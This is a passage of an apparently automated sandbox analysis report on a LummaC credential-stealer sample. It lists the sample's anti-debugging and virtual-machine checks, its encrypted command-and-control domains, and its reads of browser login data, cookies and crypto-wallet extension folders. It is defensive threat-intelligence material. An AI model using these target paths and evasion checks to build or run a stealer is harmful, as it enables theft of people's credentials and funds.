                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe TID: 4308Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe TID: 4308Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: MaZjv5XeQi.exe, MaZjv5XeQi.exe, 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158348815.00000000057C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2233422671.0000000000F91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158348815.00000000057C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: MaZjv5XeQi.exe, 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: SICE
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009DE110 LdrInitializeThunk,0_2_009DE110

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: MaZjv5XeQi.exeString found in binary or memory: bashfulacid.lat
                Source: MaZjv5XeQi.exeString found in binary or memory: curverpluch.lat
                Source: MaZjv5XeQi.exeString found in binary or memory: tentabatte.lat
                Source: MaZjv5XeQi.exeString found in binary or memory: shapestickyr.lat
                Source: MaZjv5XeQi.exeString found in binary or memory: talkynicer.lat
                Source: MaZjv5XeQi.exeString found in binary or memory: slipperyloo.lat
                Source: MaZjv5XeQi.exeString found in binary or memory: manyrestro.lat
                Source: MaZjv5XeQi.exeString found in binary or memory: observerfry.lat
                Source: MaZjv5XeQi.exeString found in binary or memory: wordyfindy.lat
                Source: MaZjv5XeQi.exe, MaZjv5XeQi.exe, 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2240279376.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286686825.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000002.2288668852.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: MaZjv5XeQi.exe, 00000000.00000003.2240416657.0000000000F7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: MaZjv5XeQi.exe PID: 5608, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: MaZjv5XeQi.exe, 00000000.00000003.2209696792.0000000000FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: MaZjv5XeQi.exe, 00000000.00000003.2209696792.0000000000FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aljgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfoofkfgppdlbm|
                Source: MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: MaZjv5XeQi.exe, 00000000.00000003.2209696792.0000000000FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
